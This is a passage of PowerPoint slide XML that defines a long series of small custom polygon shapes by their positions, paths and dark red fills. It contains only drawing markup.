        <p:spPr>
          <a:xfrm>
            <a:off x="5110200" y="5702400"/>
            <a:ext cx="3456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7" name="CustomShape 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006880" y="5702400"/>
            <a:ext cx="28080" cy="50400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E00000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="318" name="CustomShape 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4989600" y="5745240"/>
            <a:ext cx="18720" cy="64800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="41">
                <a:moveTo>
                  <a:pt x="12" y="11"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="1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19" name="CustomShape 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930920" y="5678640"/>
            <a:ext cx="55080" cy="110880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="70">
                <a:moveTo>
                  <a:pt x="35" y="40"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="40"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="400000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="320" name="CustomShape 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873680" y="5616720"/>
            <a:ext cx="55080" cy="105840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="67">
                <a:moveTo>
                  <a:pt x="35" y="39"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="39"/>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1" name="CustomShape 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4815000" y="5554800"/>
            <a:ext cx="53640" cy="102960"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="65">
                <a:moveTo>
                  <a:pt x="34" y="37"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="37"/>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22" name="CustomShape 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="5521320"/>
            <a:ext cx="26640" cy="72720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="46">
                <a:moveTo>
                  <a:pt x="17" y="18"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="1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3" name="CustomShape 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4989600" y="4921200"/>
            <a:ext cx="18720" cy="56880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="36">
                <a:moveTo>
                  <a:pt x="12" y="5"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="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4" name="CustomShape 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930920" y="4889520"/>
            <a:ext cx="55080" cy="77400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="49">
                <a:moveTo>
                  <a:pt x="35" y="19"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="19"/>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25" name="CustomShape 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873680" y="4859280"/>
            <a:ext cx="55080" cy="72720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="46">
                <a:moveTo>
                  <a:pt x="35" y="18"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="1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6" name="CustomShape 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4815000" y="4827600"/>
            <a:ext cx="53640" cy="72720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="46">
                <a:moveTo>
                  <a:pt x="34" y="18"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="1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7" name="CustomShape 115"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="4809960"/>
            <a:ext cx="26640" cy="56880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="36">
                <a:moveTo>
                  <a:pt x="17" y="10"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="10"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="400000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="CustomShape 116"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930920" y="5002200"/>
            <a:ext cx="55080" cy="82080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="52">
                <a:moveTo>
                  <a:pt x="35" y="22"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="22"/>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29" name="CustomShape 117"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873680" y="4965840"/>
            <a:ext cx="55080" cy="82080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="52">
                <a:moveTo>
                  <a:pt x="35" y="23"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="23"/>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30" name="CustomShape 118"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4815000" y="4930920"/>
            <a:ext cx="53640" cy="77400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="49">
                <a:moveTo>
                  <a:pt x="34" y="21"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="21"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="400000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="331" name="CustomShape 119"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="4911840"/>
            <a:ext cx="26640" cy="61560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="39">
                <a:moveTo>
                  <a:pt x="17" y="11"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="1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2" name="CustomShape 120"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4989600" y="5157720"/>
            <a:ext cx="18720" cy="60120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="38">
                <a:moveTo>
                  <a:pt x="12" y="8"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="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3" name="CustomShape 121"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930920" y="5114880"/>
            <a:ext cx="55080" cy="87120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="55">
                <a:moveTo>
                  <a:pt x="35" y="24"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="24"/>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34" name="CustomShape 122"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873680" y="5073480"/>
            <a:ext cx="55080" cy="85320"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="54">
                <a:moveTo>
                  <a:pt x="35" y="26"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="26"/>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5" name="CustomShape 123"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4815000" y="5035680"/>
            <a:ext cx="53640" cy="82080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="52">
                <a:moveTo>
                  <a:pt x="34" y="24"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="52"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="24"/>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36" name="CustomShape 124"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="5014800"/>
            <a:ext cx="26640" cy="60120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="38">
                <a:moveTo>
                  <a:pt x="17" y="10"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="10"/>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7" name="CustomShape 125"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4989600" y="5272200"/>
            <a:ext cx="17280" cy="63000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11" h="40">
                <a:moveTo>
                  <a:pt x="11" y="9"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="9"/>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8" name="CustomShape 126"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930920" y="5227560"/>
            <a:ext cx="55080" cy="90000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="57">
                <a:moveTo>
                  <a:pt x="35" y="27"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="57"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="27"/>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39" name="CustomShape 127"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873680" y="5183280"/>
            <a:ext cx="55080" cy="88560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="56">
                <a:moveTo>
                  <a:pt x="35" y="28"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="2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0" name="CustomShape 128"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4815000" y="5137200"/>
            <a:ext cx="53640" cy="88560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="56">
                <a:moveTo>
                  <a:pt x="34" y="28"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="2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1" name="CustomShape 129"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="5114880"/>
            <a:ext cx="26640" cy="64800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="41">
                <a:moveTo>
                  <a:pt x="17" y="13"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="13"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="400000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="342" name="CustomShape 130"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4989600" y="5391000"/>
            <a:ext cx="18720" cy="64800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="41">
                <a:moveTo>
                  <a:pt x="12" y="10"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="10"/>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3" name="CustomShape 131"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930920" y="5340240"/>
            <a:ext cx="55080" cy="93240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="59">
                <a:moveTo>
                  <a:pt x="35" y="30"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="30"/>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4" name="CustomShape 132"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873680" y="5291280"/>
            <a:ext cx="55080" cy="93240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="59">
                <a:moveTo>
                  <a:pt x="35" y="30"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="30"/>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5" name="CustomShape 133"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4815000" y="5240160"/>
            <a:ext cx="53640" cy="93240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="34" h="59">
                <a:moveTo>
                  <a:pt x="34" y="31"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="34" y="59"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34" y="3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6" name="CustomShape 134"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4784760" y="5216400"/>
            <a:ext cx="26640" cy="66240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="17" h="42">
                <a:moveTo>
                  <a:pt x="17" y="14"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="14"/>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47" name="CustomShape 135"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4989600" y="5511960"/>
            <a:ext cx="17280" cy="60120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11" h="38">
                <a:moveTo>
                  <a:pt x="11" y="8"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="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8" name="CustomShape 136"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4930920" y="5454720"/>
            <a:ext cx="55080" cy="99720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="63">
                <a:moveTo>
                  <a:pt x="35" y="32"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="32"/>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49" name="CustomShape 137"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4873680" y="5400720"/>
            <a:ext cx="55080" cy="95040"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="35" h="60">
                <a:moveTo>
                  <a:pt x="35" y="32"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="35" y="60"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="32"/>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0" name="CustomShape 138"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4813200" y="5343480"/>
            <a:ext cx="55080" cy="96480"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
